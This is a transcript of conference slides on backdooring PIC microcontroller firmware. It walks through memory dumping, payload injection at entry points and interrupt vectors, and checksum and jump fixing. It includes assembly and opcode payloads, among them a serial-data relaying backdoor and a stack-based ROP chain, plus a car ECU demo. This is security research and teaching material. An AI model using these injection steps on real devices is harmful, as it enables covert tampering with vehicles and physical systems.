backdooring hardware devices by injecting malicious ... · backdooring hardware devices by...
TRANSCRIPT
![Page 1: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/1.jpg)
Backdooring hardware devices by injecting malicious payloadson microcontrollers_
By Sheila A. Berta (@UnaPibaGeek)
![Page 2: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/2.jpg)
@UnaPibaGeek
WHO AM I?_
Sheila A. Berta (@UnaPibaGeek)
Offensive Security Researcher
A little bit more:
- Developer in ASM (Microcontrollers & Microprocessors x86/x64), C/C++, Python and Go.
- Speaker at Black Hat (x2), DEF CON (x2), Ekoparty (x4), HITB, PhDays, IEEE… & more.
![Page 3: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/3.jpg)
@UnaPibaGeek
![Page 4: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/4.jpg)
@UnaPibaGeek
MICROCONTROLLERS VS MICROPROCESSORS_
Microprocessors
Intel, AMD, ARM
…
Microcontrollers
Microchip, ATMEL, ST
…
![Page 5: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/5.jpg)
@UnaPibaGeek
MICROPROCESSORS OVERVIEW_
• Microprocessors = CPU
• Memories and I/O busses are physically separated.
• Usually bigger than a microcontroller.
• Greater processing capacity.
• Modified-Harvard memory organization.
• 32 or 64 bits (most common).
![Page 6: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/6.jpg)
@UnaPibaGeek
MICROCONTROLLERS OVERVIEW_
• Microcontrollers = CPU + RAM + ROM + I/O busses
• Smaller CPU with less processing capacity.
• Usually smaller size than microprocessors.
• Harvard memory organization.
• 16 bits (most common).
• A little stack.
![Page 7: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/7.jpg)
@UnaPibaGeek
USE CASES_
!=
Raspberry PI
ARM Microprocessor
Arduino UNO
Atmega Microcontroller
![Page 8: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/8.jpg)
@UnaPibaGeek
MICROCONTROLLERS EVOLUTION_
![Page 9: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/9.jpg)
@UnaPibaGeek
IS WORTH IT?_
• Physical Security Systems.
• Car’s ECU.
• Semaphores.
• Elevators.
• Sensors.
• Modules of Industrial systems.
• Home appliances.
• Robots.
• …
![Page 10: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/10.jpg)
@UnaPibaGeek
MICROCONTROLLERS PROGRAMMING_
![Page 11: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/11.jpg)
@UnaPibaGeek
MICROCONTROLLERS PROGRAMMING_
![Page 12: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/12.jpg)
@UnaPibaGeek
MICROCONTROLLERS PROGRAMMING_
ASM code to turning on a LED - (PIC)
MPLAB X IDE
.hex file (firmware)
![Page 13: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/13.jpg)
@UnaPibaGeek
MICROCONTROLLERS PROGRAMMING_
Microchip (PIC) programmer software Microchip (PIC) programmer hardware
![Page 14: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/14.jpg)
@UnaPibaGeek
PROGRAM MEMORY DUMP_
![Page 15: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/15.jpg)
@UnaPibaGeek
PIC MEMORY ORGANIZATION_
non-volatile non-volatilevolatile
![Page 16: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/16.jpg)
@UnaPibaGeek
PROGRAM MEMORY DUMP (STEP 1)_
Connection from PIC microcontroller to PICKIT 3
![Page 17: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/17.jpg)
@UnaPibaGeek
PROGRAM MEMORY DUMP (STEP 2)_
Using MPLAB X IDE to read (and dump) the program memory
1
2
3
4
![Page 18: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/18.jpg)
@UnaPibaGeek
PROGRAM MEMORY DUMP (STEP 3)_
Load the .hex file in the MPLAB X IDE
![Page 19: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/19.jpg)
@UnaPibaGeek
CODE VS DISASSEMBLY (EXAMPLE)_
OpCodes in the .hex dump
ASM source code Disassembly
![Page 20: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/20.jpg)
@UnaPibaGeek
PAYLOAD INJECTION: AT THE ENTRY POINT_
![Page 21: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/21.jpg)
@UnaPibaGeek
PROGRAM STANDARD STRUCTURE (PIC)_
Reset Vector: always at 0x0000 memory address
Interrupt Vector: at 0x0008 and 0x0018 memory addresses
Program entry point
![Page 22: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/22.jpg)
@UnaPibaGeek
LOCATING THE ENTRY POINT_
Entry point
Simple program example
Large program example
Example 1 -- Entry point: 0x06
Example 2 -- Entry point: 0x7F84
Memory address to inject
Memory address to inject
![Page 23: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/23.jpg)
@UnaPibaGeek
GENERATING THE PAYLOAD #1 (PoC)_
BCF TRISD,1 // Set PIN as output
BSF PORTD,1 // Turn ON a LED
BCF TRISD,2 // Set PIN as output
BSF PORTD,2 // Turn ON a LED
0x9295 = BCF TRISD,1
0x8283 = BSF PORTD,1
0x9495 = BCF TRISD,2
0x8483 = BSF PORTD,2
Little Endian: 0x9592 0x8382 0x9594 0x8384
![Page 24: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/24.jpg)
@UnaPibaGeek
INJECTING THE PAYLOAD_
Entry point at 0x28 Original program memory (.hex dump)
Entry point offset
Checksum
Payload injected at entry point (0x28)
![Page 25: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/25.jpg)
@UnaPibaGeek
CHECKSUM RECALCULATION_
Sum(bytes on the line) = Not +1 = checksum
Example:
10+00+00+00+03+EF+00+F0+00+00+95+9E+83+8E+83+6A+00+0E+95+6E = 0x634
Not(0x634) +1 = 0xFFFF 0xFFFF 0xFFFF 0xF9CC
Checksum = 0xCC
:1000000003EF00F00000959E838E836A000E956E
![Page 26: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/26.jpg)
@UnaPibaGeek
CHECKSUM RECALCULATION_
https://www.fischl.de/hex_checksum_calculator/
Payload injected and checksum fixed
![Page 27: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/27.jpg)
@UnaPibaGeek
WRITE THE PROGRAM MEMORY_
![Page 28: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/28.jpg)
@UnaPibaGeek
BEFORE / AFTER (PoC)_
Original Payload injected
![Page 29: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/29.jpg)
@UnaPibaGeek
INJECTING TO A CAR’S ECU_
DEMO TIME!
IGNITION
KEY
Entry point: 0x152A
![Page 30: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/30.jpg)
@UnaPibaGeek
ADVANCED PAYLOAD INJECTION: AT THE INTERRUPT VECTOR_
![Page 31: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/31.jpg)
@UnaPibaGeek
PERIPHERALS AND INTERRUPTIONS_
• Internal timers
• A/D converters
• CCP (Capture/Compare/PWM)
• TX/RX busses
• Others
![Page 32: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/32.jpg)
@UnaPibaGeek
GIE AND PEIE BITS_
BSF INTCON, GIE // Set GIE to 1
BSF INTCON, PEIE // Set PEIE to 1
Interruptions enabled
![Page 33: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/33.jpg)
@UnaPibaGeek
INTERRUPTION FLAGS_
Timer0
Interruption Enabled
Timer0
Interruption Flag
XXIE = Interruption Enabled
XXIF = Interruption Flag
Registers PIE1, PIE2 and PIE3 have interruption enabling bits
Registers PIR1, PIR2 and PIR3 have interruption flags bits
![Page 34: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/34.jpg)
@UnaPibaGeek
POLLING INSPECTION_
Interrupt vector
Polling
![Page 35: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/35.jpg)
@UnaPibaGeek
POLLING INSPECTION_
PIR1, 5
PIR1, 5 = PIR1, RCIF
Call to RC interruption routine
![Page 36: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/36.jpg)
@UnaPibaGeek
MEMORY ADDRESSES TO INJECT A PAYLOAD_
0x48 to inject a payload at the RC interruption
0x4E to inject a payload at Timer0 interruption
0x56 to inject a payload at the AD interruption
0x5E to inject a payload at the INT0 interruption
![Page 37: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/37.jpg)
@UnaPibaGeek
BACKDOORING THE EUSART COMMUNICATIONPERIPHERAL_
Step 1: locate where the RC interruption routine begins (by inspecting the polling)
Call to RC interruption routine
0x48
RC interruption routine begins
![Page 38: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/38.jpg)
@UnaPibaGeek
BACKDOORING THE EUSART COMMUNICATIONPERIPHERAL_
Step 2: Cook a payload that makes a relaying of the received data to a TX
peripheral which we are able to monitor externally (example)
MOVF RCREG, W // Move the received data to “W” register
BSF TXSTA, TXEN // Enable transmission
BCF TXSTA, SYNC // Set asynchronous operation
BSF RCSTA, SPEN // Set TX/CK pin as an output
MOVWF TXREG // Move received data (in W) to TXREG to be re-transmitted
0xAE50 0xAC8A 0xAC98 0xAB8E 0xAD6E
![Page 39: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/39.jpg)
@UnaPibaGeek
BACKDOORING THE EUSART COMMUNICATIONPERIPHERAL_
Step 3: lnject the payload where the RC interruption routine begins
0x48
RC interruption routine begins
Backdoor
DEMO TIME!
![Page 40: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/40.jpg)
@UnaPibaGeek
FIXING JUMPS: FLOW CORRUPTION_
Original program Program after
payload injection
![Page 41: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/41.jpg)
@UnaPibaGeek
FIXING JUMPS: GOTO AND CALL OPCODES_
GOTO opcode = 0xEF CALL opcode = 0xEC NOP opcode = 0xF0
EF06 F000 = GOTO jumping to 0x0006 offset (0x000C memory address).
EC67 F004 = CALL jumping to 0x0467 offset (0x08CE memory address).
Jump to 0x8CE (memory address) / 2 = 0x0467 offset
![Page 42: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/42.jpg)
@UnaPibaGeek
FIXING JUMPS: RECALCULATION_
Payload injected at memory address: 0x48
Payload length: 10 bytes
Example:
CALL 0x56 (EC2B F000)
CALL 0x60 (EC30 F000) Fixed jump
Original offset + payload length
Original jump
Three CALL fixed after injection
![Page 43: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/43.jpg)
@UnaPibaGeek
AUTOMATING PAYLOAD INJECTION_
https://github.com/UnaPibaGeek/UCPI
![Page 44: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/44.jpg)
@UnaPibaGeek
STACK PAYLOAD INJECTION: CONTROLLING PROGRAM FLOW_
![Page 45: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/45.jpg)
@UnaPibaGeek
STKPTR, TOSU, TOSH AND TOSL_
STKPTR = Stack Pointer register
TOSU, TOSH and TOSL = Top of Stack registers
![Page 46: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/46.jpg)
@UnaPibaGeek
PROGRAM FLOW CONTROL_
INCF STKPTR,F // SP increment
MOVLW 0x00
MOVWF TOSU // TOSU = 0x00
MOVLW 0x0C
MOVWF TOSH // TOSH = 0x0C
MOVLW 0x72
MOVWF TOSL // TOSL = 0x72
RETURN
Jump to 0x000C72
SP Increment
TOS = 0x000024
Jump to 0x000024
![Page 47: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/47.jpg)
@UnaPibaGeek
ROP-CHAIN_
ROP gadgets:
0x0060 = 0xFC2A000EFF6E000EFE6E600EFD6E
0x0058 = 0xFC2A000EFF6E000EFE6E580EFD6E
0x0050 = 0xFC2A000EFF6E000EFE6E500EFD6E
0x0048 = 0xFC2A000EFF6E000EFE6E480EFD6E
0x0040 = 0xFC2A000EFF6E000EFE6E400EFD6E
0x0038 = 0xFC2A000EFF6E000EFE6E380EFD6E
0x0030 = 0xFC2A000EFF6E000EFE6E300EFD6E
0x0028 = 0xFC2A000EFF6E000EFE6E280EFD6E
RET = 0x1200
(last)
(first)
Gadget example at 0x0040:
RETURN or RETLW
DEMO TIME!
![Page 48: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/48.jpg)
@UnaPibaGeek
PROGRAM MEMORYPROTECTIONS_
![Page 49: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/49.jpg)
@UnaPibaGeek
CODE PROTECTION_
Microchip Config Directives
Program memory dump still works
![Page 50: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/50.jpg)
@UnaPibaGeek
BOOT AND DATA PROTECTION_
Microchip Config Directives
Program memory dump doesn’t work
![Page 51: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/51.jpg)
@UnaPibaGeek
CONCLUSIONS_
![Page 52: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/52.jpg)
@UnaPibaGeek
SPECIAL THANKS_
Sol (@encodedwitch)
Nico Waisman (@nicowaisman)
Dreamlab Technologies
![Page 53: Backdooring hardware devices by injecting malicious ... · Backdooring hardware devices by injecting malicious payloads on microcontrollers_ By Sheila A. Berta (@UnaPibaGeek)](https://reader033.vdocuments.net/reader033/viewer/2022042805/5f684b712d587945c0293cf1/html5/thumbnails/53.jpg)
THANK YOU_SHEILA A. BERTA (@UNAPIBAGEEK)